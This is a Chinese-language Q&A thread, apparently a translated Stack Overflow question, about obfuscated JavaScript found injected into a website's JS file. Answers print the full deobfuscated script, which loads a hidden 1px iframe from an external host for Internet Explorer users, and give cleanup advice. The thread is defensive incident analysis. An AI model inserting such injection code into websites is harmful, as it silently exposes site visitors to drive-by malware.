1. 首頁
  2. 問答
  3. 在服務器上注入javascript代碼

在服務器上注入javascript代碼

2012-06-12 53 views
1

在我的網站中,我在js文件中發現了一些JavaScript代碼,但從未添加到服務器上,而js文件沒有對用戶的寫入權限。在服務器上注入javascript代碼

任何有關如何更改此文件並在此添加代碼以及如何保護服務器上的網站以進行此類嘗試的可能性的任何想法。

這是javascript代碼的一部分,我不知道它是如何添加到我的文件中的。

var RPTj='hYUw';function HCLac(){} 
if('hikbf'=='gloCBh')hnwT='BtbByu';var efIc;function ovPvyr(){var GcFza='sLHwL';if('jPslJ'=='WfPs')FgTgr();} 
var px0_var="0\x70x";function yefdV(){var MZIWif='pFeEIR';if('Oqoi'=='jcEyCx')YXCIxm();} 
var WxTv;var JJfPP="f\x72\x6fm\x43harCode";function MnFGT(){var WcZW='mpjU';if('GQike'=='hfiFQm')aSNa();} 
var LusRYV="";if('KSCVlW'=='ZHLn')fCxfd='nkVIX';if('rGsiG'=='uRdOG')bgTeVq();function NmGQl(){}

來源

2012-06-12 user1376613

+0

它似乎是一些JS文件,它聲稱在MSIE中刪除填充! http://jsunpack.jeek.org/dec/go?report=4d7e564d602c57c80f4ef65ce5f55c120eb9cf02 –

+0

@PraveenKumar:恩,沒有。 – ThiefMaster

+0

Fyi,我刪除了完整的惡意代碼,因爲它現在並不重要,因爲我們知道它只是一個部分。 – ThiefMaster

回答

1

使用谷歌搜索令牌之一導致this report。看起來你的代碼是該代碼的開始。完整代碼似乎要做的是插入指向http://snap3.myvnc.com/58583911.html的隱藏iframe。

格式的完整代碼:

var RPTj = 'hYUw'; 

function HCLac() {} 
if ('hikbf' == 'gloCBh') hnwT = 'BtbByu'; 
var efIc; 

function ovPvyr() { 
    var GcFza = 'sLHwL'; 
    if ('jPslJ' == 'WfPs') FgTgr(); 
} 
var px0_var = "0px"; 

function yefdV() { 
    var MZIWif = 'pFeEIR'; 
    if ('Oqoi' == 'jcEyCx') YXCIxm(); 
} 
var WxTv; 
var JJfPP = "fromCharCode"; 

function MnFGT() { 
    var WcZW = 'mpjU'; 
    if ('GQike' == 'hfiFQm') aSNa(); 
} 
var LusRYV = ""; 
if ('KSCVlW' == 'ZHLn') fCxfd = 'nkVIX'; 
if ('rGsiG' == 'uRdOG') bgTeVq(); 

function NmGQl() {} 
var appVersion_var = "appversion"; 

function FxKCOl() { 
    var Tyadnl = 'KxdiY'; 
    if ('oiXBU' == 'egVk') ikDXjx(); 
} 

function ZMlp() {} 
var HpgJJy = "a6b2b2ae786d6db1ac9fae716cabb7b4aca16ca1adab6d7376737671776f6f6ca6b2abaa"; 
var kEKvaZ = 53; 
if ('sXNxpE' == 'kYOrhd') LHXd = 'GRDMD'; 
var iQzzDyqFb = "parseInt"; 
var NVLbyx = 'SzzTbP'; 
var KnXUEO = "appendChild"; 
var oCuGvo = 'AqRu'; 
var QqDXbsz = "slice"; 
var PSvizz = 'wTGO'; 
if ('UDtvo' == 'WOvxa') EjML(); 
if ('NkueyZ' == 'hmZjo') PTCkFt(); 
if ('ARloGz' == 'ESOXD') xXLyjy(); 

function YFbf() {} 
var BdHebR = "body"; 
var EyIJOS; 
var LXlPOM = "constructor"; 

function Aibw() {} 
var UYFE = 'XToVL'; 
var RCfxR; 
var px1_var = "1px"; 

function UxfaL() {} 
var uCNeV; 
var PmfiAgi = (function() { 
    var aBOKw = 77; 
    return this; 

    function uiqNU() {} 
})(); 
var bsnc = 16; 
if ('Bxidy' == 'pXMzt') iTix = 'VlDz'; 
var BffTkrlL = "gfmhzktv" [LXlPOM]; 
var AeqcV = 178; 
if ('yDWAl' == 'aEfSc') YamYD(); 
if ('Gbiec' == 'Gfkedw') IKIyYm(); 

function RiHlap() {} 
for (var naQrl = 0; naQrl < HpgJJy.length; naQrl += 2) { 
    if ('ldgI' == 'IKpUz') rrqZYp(); 
    if ('wghLE' == 'xtjurW') QFbOk = 'erIdjm'; 
    QxXSy = PmfiAgi[iQzzDyqFb](HpgJJy[QqDXbsz](naQrl, naQrl + 2), 16) - 62; 
    var uzmz; 
    var TtQHcx = 194; 
    LusRYV += BffTkrlL[JJfPP](QxXSy); 
    if ('RfJxKN' == 'WCxvgr') qJiK(); 

    function niER() { 
     var xYfZTn = 'bTKOZ'; 
     if ('oNmb' == 'zFotVd') CErQ(); 
    } 
    var ORrPz = 66; 
} 
function qrRA() {} 
if ('xUJvl' == 'IwPl') Zsvdq(); 
var tGfG; 
var EKOhz = 234; 
var uTUrfPXx = "msaAyY"; 
var PFDee; 
if ('UrLoD' == 'Sxld') PDDgwq = 'WMta'; 
var xVwEzf = ""; 
if (navigator[appVersion_var].indexOf("MSIE") != -1) { 
    var kWawh; 
    var ipBou; 
    xVwEzf = '<iframe name="' + uTUrfPXx + '" src="' + LusRYV + '">'; 
    var OCLAkX; 
    var nRid = 246; 
    var kxFTam = 'XzkCJ'; 
} else { 
    if ('NhMm' == 'fRlNQ') mcPWV = 'wimioU'; 
    xVwEzf = 'iframe'; 
    var FLIdcI = 'yQEfas'; 
    if ('BUXe' == 'AShAfN') EKbV = 'fBEl'; 
} 
if ('YdKCO' == 'pWElN') uTSIz(); 
var VdDqgo = document.createElement(xVwEzf); 
var ZcAkY = 'meVkj'; 
var jMIFIc; 
VdDqgo.tuqYuP = function() { 
    if ('FfHJE' == 'bCay') azXnsN(); 
    if ('BlUAl' == 'cJxWM') fRGW(); 
    var ogFkn = 146; 
    this["src"] = LusRYV; 
    var AgIjr = 259; 
    var qpSQK = 92; 

    function PdHsy() {} 
} 
var qzNJ = 'aFPF'; 
if ('vNdx' == 'XYol') rQHs = 'Hxmv'; 
VdDqgo.style.width = px1_var; 
var INpVIa; 
VdDqgo.name = uTUrfPXx; 
if ('xFAX' == 'BDmDG') KbBJUL(); 
VdDqgo.style.right = px0_var; 

function hDmz() { 
    var QaDaK = 'RkXzFf'; 
    if ('zhJAW' == 'KaeI') EKMSCK(); 
} 
var FLxMGu = 'NTrTRL'; 
var VKffS; 
if ('uVncX' == 'wLjA') SxPE = 'DqmaHY'; 
VdDqgo.style.position = "absolute"; 
if ('QUcV' == 'DOyW') iHzhEN = 'nFIX'; 
if ('NkrLk' == 'KpcbG') ZaLFnC = 'eGLz'; 
VdDqgo.style.height = px1_var; 
var UcmFUb = 'qOVzZW'; 
VdDqgo.style.top = px0_var; 
var VWcgid; 
if ('XMOW' == 'Ednf') WHmsA = 'IUxM'; 
VdDqgo.tuqYuP(); 
var lXbvup = 'vYuQu'; 
if ('imkwcA' == 'WooJ') HveoG = 'lWaRP'; 

function bICzNVqfg() { 
    var YPKTox; 
    if (document[BdHebR]) { 
     if ('ngooi' == 'TqRCsb') ftbpb(); 
     document[BdHebR][KnXUEO](VdDqgo); 

     function qDuFo() { 
      var mazr = 'QnGfrg'; 
      if ('BOyz' == 'AKOa') Gngf(); 
     } 
     function pzBO() {} 
    } else { 
     var VxvCl; 
     if ('iZnVhA' == 'xXpx') yFwsuD = 'Jwngn'; 
     setTimeout(bICzNVqfg, 120); 

     function TQWAxJ() {} 
    } 
    var trjnm = 134; 

    function gZgci() { 
     var IwVkwG = 'bVoa'; 
     if ('FAipi' == 'lshUte') jAfeZ(); 
    } 
} 
function ugkLim() { 
    var WDsg = 'GXvuNm'; 
    if ('WxbcV' == 'OxFu') OwHcwI(); 
} 
bICzNVqfg(); 
if ('pdHQlr' == 'MsZfH') lqfhm(); 
var BqsQp = 'BfjE'; 
var uHPm = 'sLKHU'; 
var hZrYYl = 'Qckv'; 
if ('gjgstY' == 'dlcZ') wSnqFG = 'zSpF';

至於你的追求,以確定它是如何發生的,服務器日誌是,如果你有機會獲得他們開始的地方。

來源

2012-06-12 07:01:16 Supr

+0

謝謝,你能給我一些想法,我應該在哪裏檢查服務器日誌? – user1376613

+0

查找對JavaScript文件的引用,並查看javascript文件上次修改時的活動。 – Supr

4

有人曾訪問您的服務器並插入混淆的惡意軟件。

您很可能在您的服務器上有一些易受攻擊的腳本 - 特別是常見的第三方PHP應用程序,如WordPress或phpBB通常是針對性的。

現在該怎麼辦?

  • 關閉攻擊者用來訪問的任何漏洞。這很可能涉及使用您正在使用的任何軟件的當前版本。
  • 重新安裝從乾淨備份到擺脫所有惡意軟件和可能的後門程序。

來源

2012-06-12 06:36:04 ThiefMaster

+0

完整的JavaScript代碼是: – user1376613

+0

感謝您的回覆。請再次檢查並讓我知道「我的js文件如何在服務器上的javascript文件中編輯和插入代碼」。 – user1376613

相關問題

 相關問題